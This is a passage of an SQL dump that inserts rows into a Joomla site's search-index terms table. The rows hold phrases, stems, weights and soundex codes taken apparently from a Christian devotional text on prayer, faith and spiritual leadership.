(275420, 'nation and when', 'nation and when', 0, 1, 1.5, 'N3535', 1, '*'),
(275421, 'necessarily', 'necessarili', 0, 0, 0.7333, 'N264', 1, '*'),
(275422, 'necessarily be', 'necessarili be', 0, 1, 1.4667, 'N2641', 1, '*'),
(275423, 'necessarily be the', 'necessarili be the', 0, 1, 1.6, 'N26413', 1, '*'),
(275424, 'necessarily mean', 'necessarili mean', 0, 1, 1.5333, 'N2645', 1, '*'),
(275425, 'necessarily mean you\'ll', 'necessarili mean you', 0, 1, 1.7667, 'N26454', 1, '*'),
(275426, 'need faith', 'need faith', 0, 1, 1.3333, 'N313', 1, '*'),
(275427, 'need faith is', 'need faith is', 0, 1, 1.4333, 'N3132', 1, '*'),
(275428, 'need for', 'need for', 0, 1, 1.2667, 'N316', 2, '*'),
(275429, 'need for christians', 'need for christians', 0, 1, 1.6333, 'N316262352', 1, '*'),
(275430, 'need to fulfill', 'need to fulfill', 0, 1, 1.5, 'N31414', 1, '*'),
(275431, 'needs high', 'need high', 0, 1, 1.3333, 'N320', 1, '*'),
(275432, 'needs high spiritual', 'need high spiritual', 0, 1, 1.6667, 'N321634', 1, '*'),
(275433, 'needs your', 'need your', 0, 1, 1.3333, 'N326', 1, '*'),
(275434, 'needs your prayer', 'need your prayer', 0, 1, 1.5667, 'N32616', 1, '*'),
(275435, 'never know', 'never know', 0, 1, 1.3333, 'N1625', 1, '*'),
(275436, 'never know when', 'never know when', 0, 1, 1.5, 'N1625', 1, '*'),
(275437, 'never read', 'never read', 0, 1, 1.3333, 'N163', 1, '*'),
(275438, 'never read them', 'never read them', 0, 1, 1.5, 'N1635', 1, '*'),
(275439, 'never really', 'never really', 0, 1, 1.4, 'N164', 1, '*'),
(275440, 'never really know', 'never really know', 0, 1, 1.5667, 'N16425', 1, '*'),
(275441, 'no matter where', 'no matter where', 0, 1, 1.5, 'N360', 1, '*'),
(275442, 'not a sunday', 'not a sunday', 0, 1, 1.4, 'N3253', 1, '*'),
(275443, 'not also', 'not also', 0, 1, 1.2667, 'N342', 1, '*'),
(275444, 'not also wisdom', 'not also wisdom', 0, 1, 1.5, 'N34235', 1, '*'),
(275445, 'not human', 'not human', 0, 1, 1.3, 'N350', 1, '*'),
(275446, 'not human beings', 'not human beings', 0, 1, 1.5333, 'N35152', 1, '*'),
(275447, 'not necessarily', 'not necessarily', 0, 1, 1.5, 'N35264', 1, '*'),
(275448, 'not necessarily be', 'not necessarily be', 0, 1, 1.6, 'N352641', 1, '*'),
(275449, 'not only on', 'not only on', 0, 1, 1.3667, 'N3545', 1, '*'),
(275450, 'not upright', 'not upright', 0, 1, 1.3667, 'N31623', 1, '*'),
(275451, 'not upright in', 'not upright in', 0, 1, 1.4667, 'N316235', 1, '*'),
(275452, 'notes', 'note', 0, 0, 0.3333, 'N320', 1, '*'),
(275453, 'notes and', 'note and', 0, 1, 1.3, 'N3253', 1, '*'),
(275454, 'notes and refresh', 'note and refresh', 0, 1, 1.5667, 'N32536162', 1, '*'),
(275455, 'notes but', 'note but', 0, 1, 1.3, 'N3213', 1, '*'),
(275456, 'notes but like', 'note but like', 0, 1, 1.4667, 'N321342', 1, '*'),
(275457, 'notes in', 'note in', 0, 1, 1.2667, 'N325', 1, '*'),
(275458, 'notes in church', 'note in church', 0, 1, 1.5, 'N325262', 1, '*'),
(275459, 'nourish', 'nourish', 0, 0, 0.4667, 'N620', 1, '*'),
(275460, 'nourish your', 'nourish your', 0, 1, 1.4, 'N626', 1, '*'),
(275461, 'nourish your spirit', 'nourish your spirit', 0, 1, 1.6333, 'N6262163', 1, '*'),
(275462, 'now have the', 'now have the', 0, 1, 1.4, 'N130', 1, '*'),
(275463, 'now the', 'now the', 0, 1, 1.2333, 'N300', 1, '*'),
(275464, 'now the more', 'now the more', 0, 1, 1.4, 'N356', 1, '*'),
(275465, 'of communication', 'of communication', 0, 1, 1.5333, 'O125235', 1, '*'),
(275466, 'of communication with', 'of communication with', 0, 1, 1.7, 'O1252353', 1, '*'),
(275467, 'of driving', 'of driving', 0, 1, 1.3333, 'O136152', 1, '*'),
(275468, 'of driving you\'ll', 'of driving you', 0, 1, 1.5667, 'O1361524', 1, '*'),
(275469, 'of great', 'of great', 0, 1, 1.2667, 'O1263', 1, '*'),
(275470, 'of great faith', 'of great faith', 0, 1, 1.4667, 'O126313', 1, '*'),
(275471, 'of great men', 'of great men', 0, 1, 1.4, 'O12635', 1, '*'),
(275472, 'of peace', 'of peace', 0, 1, 1.2667, 'O120', 1, '*'),
(275473, 'of peace faith', 'of peace faith', 0, 1, 1.4667, 'O1213', 1, '*'),
(275474, 'of people take', 'of people take', 0, 1, 1.4667, 'O1432', 1, '*'),
(275475, 'of taking', 'of taking', 0, 1, 1.3, 'O13252', 2, '*'),
(275476, 'of taking notes', 'of taking notes', 0, 1, 1.5, 'O13252532', 1, '*'),
(275477, 'of the leadership', 'of the leadership', 0, 1, 1.5667, 'O1343621', 1, '*'),
(275478, 'of this role', 'of this role', 0, 1, 1.4, 'O13264', 1, '*'),
(275479, 'of time 6', 'of time 6', 0, 1, 1.3, 'O135', 1, '*'),
(275480, 'of work is', 'of work is', 0, 1, 1.3333, 'O162', 1, '*'),
(275481, 'officially', 'offici', 0, 0, 0.6667, 'O124', 1, '*'),
(275482, 'officially become', 'offici become', 0, 1, 1.5667, 'O124125', 1, '*'),
(275483, 'officially become a', 'offici become a', 0, 1, 1.6333, 'O124125', 1, '*'),
(275484, 'ofleadership', 'ofleadership', 0, 0, 0.8, 'O143621', 1, '*'),
(275485, 'ofleadership dormant', 'ofleadership dormant', 0, 1, 1.6667, 'O1436213653', 1, '*'),
(275486, 'ofleadership dormant in', 'ofleadership dormant in', 0, 1, 1.7667, 'O14362136535', 1, '*'),
(275487, 'ofliving', 'ofliv', 0, 0, 0.5333, 'O14152', 1, '*'),
(275488, 'ofliving on', 'ofliv on', 0, 1, 1.3667, 'O141525', 1, '*'),
(275489, 'ofliving on the', 'ofliv on the', 0, 1, 1.5, 'O1415253', 1, '*'),
(275490, 'on clothes', 'on clothes', 0, 1, 1.3333, 'O52432', 1, '*'),
(275491, 'on clothes food', 'on clothes food', 0, 1, 1.5, 'O5243213', 1, '*'),
(275492, 'on earth let', 'on earth let', 0, 1, 1.4, 'O56343', 1, '*'),
(275493, 'on ground', 'on ground', 0, 1, 1.3, 'O52653', 1, '*'),
(275494, 'on ground sadly', 'on ground sadly', 0, 1, 1.5, 'O52653234', 1, '*'),
(275495, 'on the face', 'on the face', 0, 1, 1.3667, 'O5312', 1, '*'),
(275496, 'on the problems', 'on the problems', 0, 1, 1.5, 'O53161452', 1, '*'),
(275497, 'on things', 'on things', 0, 1, 1.3, 'O5352', 1, '*'),
(275498, 'on things that', 'on things that', 0, 1, 1.4667, 'O53523', 1, '*'),
(275499, 'on which', 'on which', 0, 1, 1.2667, 'O520', 1, '*'),
(275500, 'on which christianity', 'on which christianity', 0, 1, 1.7, 'O5262353', 1, '*'),
(275501, 'on which we', 'on which we', 0, 1, 1.3667, 'O520', 1, '*'),
(275502, 'one needs', 'on needs', 0, 1, 1.3, 'O532', 1, '*'),
(275503, 'one needs your', 'on needs your', 0, 1, 1.4667, 'O5326', 1, '*'),
(275504, 'one way', 'on way', 0, 1, 1.2333, 'O500', 1, '*'),
(275505, 'one way you', 'on way you', 0, 1, 1.3667, 'O500', 1, '*'),
(275506, 'ones leading', 'on leading', 0, 1, 1.4, 'O524352', 1, '*'),
(275507, 'ones leading everyone', 'on leading everyone', 0, 1, 1.7, 'O524352165', 1, '*'),
(275508, 'only on', 'onli on', 0, 1, 1.2333, 'O545', 1, '*'),
(275509, 'only on clothes', 'onli on clothes', 0, 1, 1.5, 'O5452432', 1, '*'),
(275510, 'only way', 'onli way', 0, 1, 1.2667, 'O540', 2, '*'),
(275511, 'only way to', 'onli way to', 0, 1, 1.3667, 'O543', 1, '*'),
(275512, 'or a thermostat', 'or a thermostat', 0, 1, 1.5, 'O636523', 1, '*'),
(275513, 'or at', 'or at', 0, 1, 1.1667, 'O630', 1, '*'),
(275514, 'or at your', 'or at your', 0, 1, 1.3333, 'O636', 1, '*'),
(275515, 'or you end', 'or you end', 0, 1, 1.3333, 'O653', 1, '*'),
(275516, 'others in', 'other in', 0, 1, 1.3, 'O3625', 1, '*'),
(275517, 'others in every', 'other in every', 0, 1, 1.5, 'O362516', 1, '*'),
(275518, 'our faith', 'our faith', 0, 1, 1.3, 'O613', 2, '*'),
(275519, 'our faith start', 'our faith start', 0, 1, 1.5, 'O6132363', 1, '*'),
(275520, 'our hearts', 'our hearts', 0, 1, 1.3333, 'O632', 1, '*'),
(275521, 'our hearts a', 'our hearts a', 0, 1, 1.4, 'O632', 1, '*'),
(275522, 'our prescribed', 'our prescribed', 0, 1, 1.4667, 'O6162613', 1, '*'),
(275523, 'our prescribed means', 'our prescribed means', 0, 1, 1.6667, 'O616261352', 1, '*'),
(275524, 'out in faith', 'out in faith', 0, 1, 1.4, 'O3513', 1, '*'),
(275525, 'out yourself', 'out yourself', 0, 1, 1.4, 'O36241', 1, '*'),
(275526, 'out yourself and', 'out yourself and', 0, 1, 1.5333, 'O3624153', 1, '*'),
(275527, 'overlooked', 'overlook', 0, 0, 0.6667, 'O16423', 1, '*'),
(275528, 'overlooked for', 'overlook for', 0, 1, 1.4667, 'O1642316', 1, '*'),
(275529, 'overlooked for a', 'overlook for a', 0, 1, 1.5333, 'O1642316', 1, '*'),
(275530, 'part 2', 'part 2', 0, 1, 1.2, 'P630', 2, '*'),
(275531, 'pastor but', 'pastor but', 0, 1, 1.3333, 'P23613', 1, '*'),
(275532, 'pastor but like', 'pastor but like', 0, 1, 1.5, 'P2361342', 1, '*'),
(275533, 'pastor instead', 'pastor instead', 0, 1, 1.4667, 'P236523', 1, '*'),
(275534, 'pastor instead embrace', 'pastor instead embrace', 0, 1, 1.7333, 'P2365235162', 1, '*'),
(275535, 'paul says', 'paul says', 0, 1, 1.3, 'P420', 1, '*'),
(275536, 'paul says in', 'paul says in', 0, 1, 1.4, 'P425', 1, '*'),
(275537, 'peace', 'peac', 0, 0, 0.3333, 'P200', 1, '*'),
(275538, 'peace faith', 'peac faith', 0, 1, 1.3667, 'P213', 1, '*'),
(275539, 'peace faith salvation', 'peac faith salvation', 0, 1, 1.7, 'P21324135', 1, '*'),
(275540, 'people take', 'peopl take', 0, 1, 1.3667, 'P432', 1, '*'),
(275541, 'people take notes', 'peopl take notes', 0, 1, 1.5667, 'P432532', 1, '*'),
(275542, 'people you don\'t', 'peopl you don', 0, 1, 1.5333, 'P4353', 1, '*'),
(275543, 'periods', 'period', 0, 0, 0.4667, 'P632', 2, '*'),
(275544, 'periods of', 'period of', 0, 1, 1.3333, 'P6321', 1, '*'),
(275545, 'periods of time', 'period of time', 0, 1, 1.5, 'P632135', 1, '*'),
(275546, 'place of work', 'place of work', 0, 1, 1.4333, 'P42162', 1, '*'),
(275547, 'plague today\'s christians', 'plagu today christians', 0, 1, 1.8333, 'P423262352', 1, '*'),
(275548, 'plan to go', 'plan to go', 0, 1, 1.3333, 'P4532', 1, '*'),
(275549, 'play 1.you', 'plai 1.you', 0, 1, 1.3333, 'P400', 1, '*'),
(275550, 'play 1.you are', 'plai 1.you are', 0, 1, 1.4667, 'P460', 1, '*'),
(275551, 'play on', 'plai on', 0, 1, 1.2333, 'P450', 1, '*'),
(275552, 'play on earth', 'plai on earth', 0, 1, 1.4333, 'P4563', 1, '*'),
(275553, 'play romans', 'plai romans', 0, 1, 1.3667, 'P4652', 1, '*'),
(275554, 'play romans 12', 'plai romans 12', 0, 1, 1.4667, 'P4652', 1, '*'),
(275555, 'point was', 'point was', 0, 1, 1.3, 'P532', 1, '*'),
(275556, 'point was dealt', 'point was dealt', 0, 1, 1.5, 'P532343', 1, '*'),
(275557, 'points from', 'point from', 0, 1, 1.3667, 'P532165', 1, '*'),
(275558, 'points from the', 'point from the', 0, 1, 1.5, 'P5321653', 1, '*'),
(275559, 'position at', 'posit at', 0, 1, 1.3667, 'P2353', 1, '*'),
(275560, 'position at church', 'posit at church', 0, 1, 1.6, 'P2353262', 1, '*'),
(275561, 'powers not', 'power not', 0, 1, 1.3333, 'P6253', 1, '*'),
(275562, 'powers not human', 'power not human', 0, 1, 1.5333, 'P62535', 1, '*'),
(275563, 'practice consider', 'practic consider', 0, 1, 1.5667, 'P62325236', 1, '*'),
(275564, 'practice consider this', 'practic consider this', 0, 1, 1.7333, 'P6232523632', 1, '*'),
(275565, 'practice in', 'practic in', 0, 1, 1.3667, 'P62325', 1, '*'),
(275566, 'practice in your', 'practic in your', 0, 1, 1.5333, 'P623256', 1, '*'),
(275567, 'pray always', 'prai always', 0, 1, 1.3667, 'P642', 1, '*'),
(275568, 'pray always prayer', 'prai always prayer', 0, 1, 1.6, 'P64216', 1, '*'),
(275569, 'pray for a', 'prai for a', 0, 1, 1.3333, 'P616', 1, '*'),
(275570, 'prayer is', 'prayer is', 0, 1, 1.3, 'P620', 1, '*'),
(275571, 'prayer is the', 'prayer is the', 0, 1, 1.4333, 'P623', 1, '*'),
(275572, 'prayer life very', 'prayer life very', 0, 1, 1.5333, 'P6416', 1, '*'),
(275573, 'prayer urgently', 'prayer urgently', 0, 1, 1.5, 'P62534', 1, '*'),
(275574, 'prayer urgently and', 'prayer urgently and', 0, 1, 1.6333, 'P6253453', 1, '*'),
(275575, 'praying for long', 'prai for long', 0, 1, 1.5333, 'P65216452', 1, '*'),
(275576, 'praying now', 'prai now', 0, 1, 1.3667, 'P6525', 1, '*'),
(275577, 'praying now the', 'prai now the', 0, 1, 1.5, 'P65253', 1, '*'),
(275578, 'prepare yourself', 'prepar yourself', 0, 1, 1.5333, 'P616241', 1, '*'),
(275579, 'prepare yourself for', 'prepar yourself for', 0, 1, 1.6667, 'P6162416', 1, '*'),
(275580, 'prepared to', 'prepar to', 0, 1, 1.3667, 'P6163', 1, '*'),
(275581, 'prepared to stand', 'prepar to stand', 0, 1, 1.5667, 'P61632353', 1, '*'),
(275582, 'prescribed', 'prescrib', 0, 0, 0.6667, 'P62613', 1, '*'),
(275583, 'prescribed means', 'prescrib means', 0, 1, 1.5333, 'P6261352', 1, '*'),
(275584, 'prescribed means ofliving', 'prescrib means ofliving', 0, 1, 1.8333, 'P626135214152', 1, '*'),
(275585, 'previous', 'previou', 0, 0, 0.5333, 'P612', 1, '*'),
(275586, 'previous chapter', 'previou chapter', 0, 1, 1.5333, 'P612136', 1, '*'),
(275587, 'previous chapter 3', 'previou chapter 3', 0, 1, 1.6, 'P612136', 1, '*'),
(275588, 'previous chapter every', 'previou chapter every', 0, 1, 1.7333, 'P61213616', 1, '*'),
(275589, 'primary commission', 'primari commission', 0, 1, 1.6, 'P6562525', 1, '*'),
(275590, 'primary commission to', 'primari commission to', 0, 1, 1.7, 'P65625253', 1, '*'),
(275591, 'primary tool', 'primari tool', 0, 1, 1.4, 'P65634', 1, '*'),
(275592, 'primary tool of', 'primari tool of', 0, 1, 1.5, 'P656341', 1, '*'),
(275593, 'principalities', 'princip', 0, 0, 0.9333, 'P6521432', 1, '*'),
(275594, 'principalities and', 'princip and', 0, 1, 1.6, 'P652143253', 1, '*'),
(275595, 'principalities and powers', 'princip and powers', 0, 1, 1.8333, 'P652143253162', 1, '*'),
(275596, 'process serious', 'process serious', 0, 1, 1.5, 'P6262', 1, '*'),
(275597, 'process serious and', 'process serious and', 0, 1, 1.6333, 'P626253', 1, '*'),
(275598, 'properly accept', 'properli accept', 0, 1, 1.5, 'P6164213', 1, '*'),
(275599, 'properly accept god\'s', 'properli accept god', 0, 1, 1.7, 'P6164213232', 1, '*'),
(275600, 'properly you', 'properli you', 0, 1, 1.4, 'P6164', 1, '*'),
(275601, 'properly you must', 'properli you must', 0, 1, 1.5667, 'P6164523', 1, '*'),
(275602, 'proverbs 23 23', 'proverb 23 23', 0, 1, 1.4667, 'P61612', 1, '*'),
(275603, 'put everything', 'put everything', 0, 1, 1.4667, 'P316352', 1, '*'),
(275604, 'put everything you\'ve', 'put everything you', 0, 1, 1.7, 'P3163521', 1, '*'),
(275605, 'putting faith', 'put faith', 0, 1, 1.4333, 'P35213', 1, '*'),
(275606, 'putting faith into', 'put faith into', 0, 1, 1.6, 'P3521353', 1, '*'),
(275607, 'question are', 'question are', 0, 1, 1.4, 'Q356', 1, '*'),
(275608, 'question are you', 'question are you', 0, 1, 1.5333, 'Q356', 1, '*'),
(275609, 'reach out in', 'reach out in', 0, 1, 1.4, 'R235', 1, '*'),
(275610, 'read them make', 'read them make', 0, 1, 1.4667, 'R352', 1, '*'),
(275611, 'reading the', 'read the', 0, 1, 1.3667, 'R3523', 1, '*'),
(275612, 'reading the theory', 'read the theory', 0, 1, 1.6, 'R35236', 1, '*'),
(275613, 'ready to pray', 'readi to pray', 0, 1, 1.4333, 'R316', 1, '*'),
(275614, 'really cannot', 'realli cannot', 0, 1, 1.4333, 'R4253', 1, '*'),
(275615, 'really cannot give', 'realli cannot give', 0, 1, 1.6, 'R425321', 1, '*'),
(275616, 'really know', 'realli know', 0, 1, 1.3667, 'R425', 1, '*'),
(275617, 'really know how', 'realli know how', 0, 1, 1.5, 'R425', 1, '*'),
(275618, 'reason we', 'reason we', 0, 1, 1.3, 'R250', 1, '*'),
(275619, 'reason we need', 'reason we need', 0, 1, 1.4667, 'R253', 1, '*'),
(275620, 'refresh your', 'refresh your', 0, 1, 1.4, 'R1626', 1, '*'),
(275621, 'refresh your mind', 'refresh your mind', 0, 1, 1.5667, 'R162653', 1, '*'),
(275622, 'responsibilities and', 'respons and', 0, 1, 1.6667, 'R2152143253', 1, '*'),
(275623, 'responsibilities and stop', 'respons and stop', 0, 1, 1.8333, 'R2152143253231', 1, '*'),
(275624, 'responsibility to intercede', 'respons to intercede', 0, 1, 1.9, 'R215214353623', 1, '*'),
(275625, 'rests', 'rest', 0, 0, 0.3333, 'R232', 1, '*'),
(275626, 'rests faith', 'rest faith', 0, 1, 1.3667, 'R23213', 1, '*'),
(275627, 'rests faith is', 'rest faith is', 0, 1, 1.4667, 'R232132', 1, '*'),
(275628, 'righteousness the', 'righteous the', 0, 1, 1.5667, 'R232523', 1, '*'),
(275629, 'righteousness the gospel', 'righteous the gospel', 0, 1, 1.8, 'R232523214', 1, '*'),
(275630, 'role can', 'role can', 0, 1, 1.2667, 'R425', 1, '*'),
(275631, 'role can be', 'role can be', 0, 1, 1.3667, 'R4251', 1, '*'),
(275632, 'roles', 'role', 0, 0, 0.3333, 'R420', 1, '*'),
(275633, 'roles a', 'role a', 0, 1, 1.2333, 'R420', 1, '*'),
(275634, 'roles a true', 'role a true', 0, 1, 1.4, 'R4236', 1, '*'),
(275635, 'roles god', 'role god', 0, 1, 1.3, 'R423', 1, '*'),
(275636, 'roles god expects', 'role god expects', 0, 1, 1.5667, 'R42321232', 1, '*'),
(275637, 'romans 10', 'roman 10', 0, 1, 1.3, 'R520', 1, '*'),
(275638, 'romans 10 17', 'roman 10 17', 0, 1, 1.4, 'R520', 1, '*'),
(275639, 'ruin', 'ruin', 0, 0, 0.2667, 'R500', 1, '*'),
(275640, 'ruin your', 'ruin your', 0, 1, 1.3, 'R560', 1, '*'),
(275641, 'ruin your life', 'ruin your life', 0, 1, 1.4667, 'R5641', 1, '*'),
(275642, 'sadly enough', 'sadli enough', 0, 1, 1.4, 'S3452', 1, '*'),
(275643, 'sadly enough this', 'sadli enough this', 0, 1, 1.5667, 'S345232', 1, '*'),
(275644, 'salvation and', 'salvat and', 0, 1, 1.4333, 'S41353', 1, '*'),
(275645, 'salvation and god\'s', 'salvat and god', 0, 1, 1.6333, 'S41353232', 1, '*'),
(275646, 'saw in', 'saw in', 0, 1, 1.2, 'S500', 1, '*'),
(275647, 'saw in the', 'saw in the', 0, 1, 1.3333, 'S530', 1, '*'),
(275648, 'says behold', 'sai behold', 0, 1, 1.3667, 'S143', 1, '*'),
(275649, 'says behold his', 'sai behold his', 0, 1, 1.5, 'S1432', 1, '*'),
(275650, 'says in ephesians', 'sai in ephesians', 0, 1, 1.5667, 'S51252', 1, '*'),
(275651, 'says in proverbs', 'sai in proverbs', 0, 1, 1.5333, 'S5161612', 1, '*'),
(275652, 'scholar', 'scholar', 0, 0, 0.4667, 'S460', 1, '*'),
(275653, 'scholar you', 'scholar you', 0, 1, 1.3667, 'S460', 1, '*'),
(275654, 'scholar you must', 'scholar you must', 0, 1, 1.5333, 'S46523', 1, '*'),
(275655, 'scripture are', 'scriptur are', 0, 1, 1.4333, 'S6136', 1, '*'),
(275656, 'scripture are you', 'scriptur are you', 0, 1, 1.5667, 'S6136', 1, '*'),
(275657, 'scriptures the', 'scriptur the', 0, 1, 1.4667, 'S613623', 1, '*'),
(275658, 'scriptures the bible', 'scriptur the bible', 0, 1, 1.6667, 'S61362314', 1, '*'),
(275659, 'scriptures you', 'scriptur you', 0, 1, 1.4667, 'S61362', 1, '*'),
(275660, 'scriptures you know', 'scriptur you know', 0, 1, 1.6333, 'S613625', 1, '*'),
(275661, 'seek divine', 'seek divine', 0, 1, 1.3667, 'S315', 1, '*'),
(275662, 'seek divine knowledge', 'seek divine knowledge', 0, 1, 1.7, 'S31525432', 1, '*'),
(275663, 'seek truth', 'seek truth', 0, 1, 1.3333, 'S363', 1, '*'),
(275664, 'seek truth wisdom', 'seek truth wisdom', 0, 1, 1.5667, 'S363235', 1, '*'),
(275665, 'seems like', 'seem like', 0, 1, 1.3333, 'S5242', 1, '*'),
(275666, 'seems like all', 'seem like all', 0, 1, 1.4667, 'S52424', 1, '*'),
(275667, 'seen so', 'seen so', 0, 1, 1.2333, 'S520', 1, '*'),
(275668, 'seen so far', 'seen so far', 0, 1, 1.3667, 'S5216', 1, '*'),
(275669, 'sellit', 'sellit', 0, 0, 0.4, 'S430', 1, '*'),
(275670, 'sellit not', 'sellit not', 0, 1, 1.3333, 'S4353', 1, '*'),
(275671, 'sellit not also', 'sellit not also', 0, 1, 1.5, 'S435342', 1, '*'),
(275672, 'sensitivity to', 'sensit to', 0, 1, 1.4667, 'S52313', 2, '*'),
(275673, 'sensitivity to lead', 'sensit to lead', 0, 1, 1.6333, 'S5231343', 1, '*'),
(275674, 'serious and now', 'seriou and now', 0, 1, 1.5, 'S62535', 1, '*'),
(275675, 'serious develop', 'seriou develop', 0, 1, 1.5, 'S623141', 1, '*'),
(275676, 'serious develop the', 'seriou develop the', 0, 1, 1.6333, 'S6231413', 1, '*'),
(275677, 'serious don\'t shy', 'seriou don shy', 0, 1, 1.5667, 'S623532', 1, '*'),
(275678, 'serious you\'ll', 'seriou you', 0, 1, 1.4667, 'S624', 1, '*'),
(275679, 'serious you\'ll never', 'seriou you never', 0, 1, 1.6667, 'S624516', 1, '*'),
(275680, 'sermon', 'sermon', 0, 0, 0.4, 'S650', 1, '*'),
(275681, 'sermon notes', 'sermon notes', 0, 1, 1.4, 'S6532', 1, '*'),
(275682, 'sermon notes and', 'sermon notes and', 0, 1, 1.5333, 'S653253', 1, '*'),
(275683, 'servants and', 'servant and', 0, 1, 1.4, 'S6153253', 1, '*'),
(275684, 'servants and directly', 'servant and directly', 0, 1, 1.7, 'S61532536234', 1, '*'),
(275685, 'shall live', 'shall live', 0, 1, 1.3333, 'S410', 1, '*'),
(275686, 'shall live by', 'shall live by', 0, 1, 1.4333, 'S410', 1, '*'),
(275687, 'should play', 'should play', 0, 1, 1.3667, 'S4314', 1, '*'),
(275688, 'should play 1.you', 'should play 1.you', 0, 1, 1.5667, 'S4314', 1, '*'),
(275689, 'shy', 'shy', 0, 0, 0.2, 'S000', 1, '*'),
(275690, 'shy away', 'shy away', 0, 1, 1.2667, 'S000', 1, '*'),
(275691, 'shy away from', 'shy away from', 0, 1, 1.4333, 'S165', 1, '*'),
(275692, 'simple and', 'simpl and', 0, 1, 1.3333, 'S51453', 1, '*'),
(275693, 'simple and straightforward', 'simpl and straightforward', 0, 1, 1.8667, 'S5145323623163', 1, '*'),
(275694, 'situation it\'s', 'situat it', 0, 1, 1.4667, 'S3532', 1, '*'),
(275695, 'situation it\'s the', 'situat it the', 0, 1, 1.6, 'S35323', 1, '*'),
(275696, 'so also', 'so also', 0, 1, 1.2333, 'S420', 1, '*'),
(275697, 'so also to', 'so also to', 0, 1, 1.3333, 'S423', 1, '*'),
(275698, 'so far', 'so far', 0, 1, 1.2, 'S160', 1, '*'),
(275699, 'so far we', 'so far we', 0, 1, 1.3, 'S160', 1, '*'),
(275700, 'soldier ephesians', 'soldier ephesians', 0, 1, 1.5667, 'S4361252', 1, '*'),
(275701, 'soldier ephesians 6', 'soldier ephesians 6', 0, 1, 1.6333, 'S4361252', 1, '*'),
(275702, 'soldier is', 'soldier is', 0, 1, 1.3333, 'S4362', 1, '*'),
(275703, 'soldier is to', 'soldier is to', 0, 1, 1.4333, 'S43623', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(275704, 'something god', 'someth god', 0, 1, 1.4333, 'S53523', 1, '*'),
(275705, 'something god had', 'someth god had', 0, 1, 1.5667, 'S53523', 1, '*'),
(275706, 'sometime', 'sometim', 0, 0, 0.5333, 'S535', 1, '*'),
(275707, 'sometime to', 'sometim to', 0, 1, 1.3667, 'S5353', 1, '*'),
(275708, 'sometime to a', 'sometim to a', 0, 1, 1.4333, 'S5353', 1, '*'),
(275709, 'somewhere and', 'somewher and', 0, 1, 1.4333, 'S5653', 1, '*'),
(275710, 'somewhere and sometime', 'somewher and sometime', 0, 1, 1.7333, 'S56532535', 1, '*'),
(275711, 'soul which is', 'soul which is', 0, 1, 1.4333, 'S420', 1, '*'),
(275712, 'souls for', 'soul for', 0, 1, 1.3, 'S4216', 1, '*'),
(275713, 'souls for him', 'soul for him', 0, 1, 1.4333, 'S42165', 1, '*'),
(275714, 'spare yourself', 'spare yourself', 0, 1, 1.4667, 'S16241', 1, '*'),
(275715, 'spare yourself take', 'spare yourself take', 0, 1, 1.6333, 'S1624132', 1, '*'),
(275716, 'spend your', 'spend your', 0, 1, 1.3333, 'S1536', 1, '*'),
(275717, 'spend your money', 'spend your money', 0, 1, 1.5333, 'S15365', 1, '*'),
(275718, 'spend your time', 'spend your time', 0, 1, 1.5, 'S153635', 1, '*'),
(275719, 'spends', 'spend', 0, 0, 0.4, 'S1532', 1, '*'),
(275720, 'spends his', 'spend his', 0, 1, 1.3333, 'S1532', 1, '*'),
(275721, 'spends his life', 'spend his life', 0, 1, 1.5, 'S153241', 1, '*'),
(275722, 'spirit such', 'spirit such', 0, 1, 1.3667, 'S1632', 1, '*'),
(275723, 'spirit such as', 'spirit such as', 0, 1, 1.4667, 'S1632', 1, '*'),
(275724, 'spirit with', 'spirit with', 0, 1, 1.3667, 'S163', 2, '*'),
(275725, 'spirit with the', 'spirit with the', 0, 1, 1.5, 'S163', 1, '*'),
(275726, 'spiritual depth', 'spiritu depth', 0, 1, 1.5, 'S1634313', 1, '*'),
(275727, 'spiritual depth and', 'spiritu depth and', 0, 1, 1.6333, 'S163431353', 1, '*'),
(275728, 'spiritual stamina', 'spiritu stamina', 0, 1, 1.5667, 'S1634235', 1, '*'),
(275729, 'spiritual stamina and', 'spiritu stamina and', 0, 1, 1.7, 'S16342353', 1, '*'),
(275730, 'spiritual warfare', 'spiritu warfare', 0, 1, 1.5667, 'S1634616', 1, '*'),
(275731, 'spiritual warfare lastly', 'spiritu warfare lastly', 0, 1, 1.8, 'S16346164234', 1, '*'),
(275732, 'spiritual warfare properly', 'spiritu warfare properly', 0, 1, 1.8667, 'S163461616164', 1, '*'),
(275733, 'spiritual wisdom', 'spiritu wisdom', 0, 1, 1.5333, 'S1634235', 1, '*'),
(275734, 'spiritual wisdom spiritual', 'spiritu wisdom spiritual', 0, 1, 1.8667, 'S163423521634', 1, '*'),
(275735, 'stamina and', 'stamina and', 0, 1, 1.3667, 'S353', 1, '*'),
(275736, 'stamina and the', 'stamina and the', 0, 1, 1.5, 'S353', 1, '*'),
(275737, 'stamina is', 'stamina is', 0, 1, 1.3333, 'S352', 1, '*'),
(275738, 'stamina is by', 'stamina is by', 0, 1, 1.4333, 'S3521', 1, '*'),
(275739, 'stamina to', 'stamina to', 0, 1, 1.3333, 'S353', 1, '*'),
(275740, 'stamina to be', 'stamina to be', 0, 1, 1.4333, 'S3531', 1, '*'),
(275741, 'stand against', 'stand against', 0, 1, 1.4333, 'S3532523', 1, '*'),
(275742, 'stand against the', 'stand against the', 0, 1, 1.5667, 'S3532523', 1, '*'),
(275743, 'stand as', 'stand as', 0, 1, 1.2667, 'S3532', 1, '*'),
(275744, 'stand as christians', 'stand as christians', 0, 1, 1.6333, 'S353262352', 1, '*'),
(275745, 'start putting faith', 'start putting faith', 0, 1, 1.6333, 'S363135213', 1, '*'),
(275746, 'state nation', 'state nation', 0, 1, 1.4, 'S3535', 1, '*'),
(275747, 'state nation and', 'state nation and', 0, 1, 1.5333, 'S35353', 1, '*'),
(275748, 'stop creating', 'stop creating', 0, 1, 1.4333, 'S3126352', 1, '*'),
(275749, 'stop creating confusions', 'stop creating confusions', 0, 1, 1.8, 'S312635251252', 1, '*'),
(275750, 'stories', 'stori', 0, 0, 0.4667, 'S362', 1, '*'),
(275751, 'stories of', 'stori of', 0, 1, 1.3333, 'S3621', 1, '*'),
(275752, 'stories of great', 'stori of great', 0, 1, 1.5333, 'S3621263', 1, '*'),
(275753, 'straightforward', 'straightforward', 0, 0, 1, 'S3623163', 1, '*'),
(275754, 'straightforward take', 'straightforward take', 0, 1, 1.6667, 'S36231632', 1, '*'),
(275755, 'straightforward take your', 'straightforward take your', 0, 1, 1.8333, 'S362316326', 1, '*'),
